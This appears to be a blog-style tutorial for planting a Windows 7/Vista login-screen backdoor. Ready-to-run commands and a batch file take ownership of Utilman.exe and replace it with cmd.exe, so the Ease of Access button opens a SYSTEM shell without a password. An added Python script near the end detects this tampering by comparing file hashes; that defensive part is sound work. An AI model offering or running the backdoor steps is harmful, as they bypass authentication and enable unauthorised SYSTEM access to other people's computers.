Windows 7 and Vista Backdoor

  • If you have any experience with Windows 7 or Vista, you will know that the Administrator account is disabled by default. In XP, a simple backdoor was available: hitting Ctrl-Alt-Delete twice at the login screen brought you to a proper login prompt, where you could log into an unprotected Administrator account. Because this is not possible in Windows 7 or Vista, I looked for a different way to get in.
    
    When you come to the login screen for Windows 7, there are three doors that lead to different situations: 
    
    The user account: typically brings you to a password prompt if it is clicked, and the account has been password protected. Nothing here...
    
    The shutdown button: Gives you the option to restart, shutdown, or put your computer to sleep. Another dead end...
    
    The Ease Of Access button: Gives you multiple options to improve the usability of Windows 7 or Vista. These options have to be stored somewhere in the WINDOWS folder... let's go take a peek. 
    
    After a little research, I found that the executable that the Ease Of Access option executes is called "Utilman.exe" in the system32 folder of WINDOWS. 
    
    Light bulb moment. 
    
    What if we replaced that utility with a command prompt?
    
    So, I tried to replace it with a different executable. Unfortunately, I could not change its name or delete it; it was locked. I tried using my favorite unlocking utility, Unlocker, but that program is not compatible with Windows 7. So I researched online for a better way to unlock it. I found a proper command line argument that allowed me to take ownership of the file, and voila! An unlocked Utilman.exe file.
    
    Here are the steps to making the backdoor:
    
    1. Take full ownership of the Utilman.exe file.
     
    takeown /f "c:\windows\system32\Utilman.exe"
    
    2. Modify the Access Control List that controls this file, and grant the Administrators group full access to the file.
    
    icacls "c:\windows\system32\Utilman.exe" /grant administrators:F
    
    3. Rename the Utilman.exe file, so that it is not called by Windows at any time.
    
    rename c:\windows\system32\Utilman.exe Utilman2.exe
    
    4. Copy the command line executable in the same folder, and rename it to something generic, so that it doesn't interfere with the original command line executable. I used cmd5.exe.
    
    copy c:\windows\system32\cmd.exe c:\windows\system32\cmd5.exe
    
    5. Rename the copied command line executable to Utilman.exe, thus substituting the command prompt for the Ease of Access utility.
    
    rename c:\windows\system32\cmd5.exe Utilman.exe
    
    And you're done! Make sure you run all of these commands as administrator by right-clicking the command prompt file and selecting "Run as Administrator". 
    
    I took the liberty of writing a batch file that, when run as admin, performs all of these steps in the blink of an eye. To create your own, simply open a .txt file with Notepad and copy these commands into the file:
    
    takeown /f "c:\windows\system32\Utilman.exe"
    icacls "c:\windows\system32\Utilman.exe" /grant administrators:F
    rename c:\windows\system32\Utilman.exe Utilman2.exe
    copy c:\windows\system32\cmd.exe c:\windows\system32\cmd5.exe
    rename c:\windows\system32\cmd5.exe Utilman.exe
    
    Save as:
    
    .bat
    
    Right click, "Run as Administrator".
    
    To test to see if it works, reboot your computer, and when it comes to the login screen, instead of logging in, click on the Ease of Access button. It should present you with a command shell with SYSTEM privileges.
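
The substitution made in steps 3 to 5 leaves Utilman.exe byte-identical to cmd.exe, which a defender can detect by comparing hashes on a live system or a mounted disk image. The Python check below is an added example, not part of the original post; the two demo directories and their file contents are constructed, and the leftover names (Utilman2.exe, cmd5.exe) are the ones this post happens to use.

```python
import hashlib
import tempfile
from pathlib import Path

# Names taken from the steps above. The renamed copies are this post's choices,
# so their absence proves nothing; the hash comparison is the reliable signal.
TARGET = "utilman.exe"
SHELL = "cmd.exe"
LEFTOVERS = ("utilman2.exe", "cmd5.exe")


def sha256(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def check_system32(system32: Path) -> list[str]:
    """Return findings for a live or mounted System32 directory."""
    # Case-insensitive lookup: a mounted image may sit on a case-sensitive FS.
    files = {p.name.lower(): p for p in system32.iterdir() if p.is_file()}
    findings = []
    target, shell = files.get(TARGET), files.get(SHELL)
    if target is None:
        findings.append("Utilman.exe is missing")
    elif shell is not None and sha256(target) == sha256(shell):
        findings.append("Utilman.exe is byte-identical to cmd.exe")
    for name in LEFTOVERS:
        if name in files:
            findings.append(f"unexpected file present: {files[name].name}")
    return findings


def demo() -> tuple[list[str], list[str]]:
    """Build two constructed System32 directories (clean, tampered) and check both."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, bad = Path(tmp, "clean"), Path(tmp, "tampered")
        for d in (clean, bad):
            d.mkdir()
            (d / "cmd.exe").write_bytes(b"constructed-cmd-bytes")
        (clean / "Utilman.exe").write_bytes(b"constructed-utilman-bytes")
        (bad / "Utilman.exe").write_bytes(b"constructed-cmd-bytes")
        (bad / "Utilman2.exe").write_bytes(b"constructed-utilman-bytes")
        return check_system32(clean), check_system32(bad)


if __name__ == "__main__":
    for label, result in zip(("clean", "tampered"), demo()):
        print(label, result or "no findings")
```

On a real host, pass the actual System32 path to `check_system32`; any finding on Utilman.exe warrants checking the file's owner and ACL, since steps 1 and 2 change both.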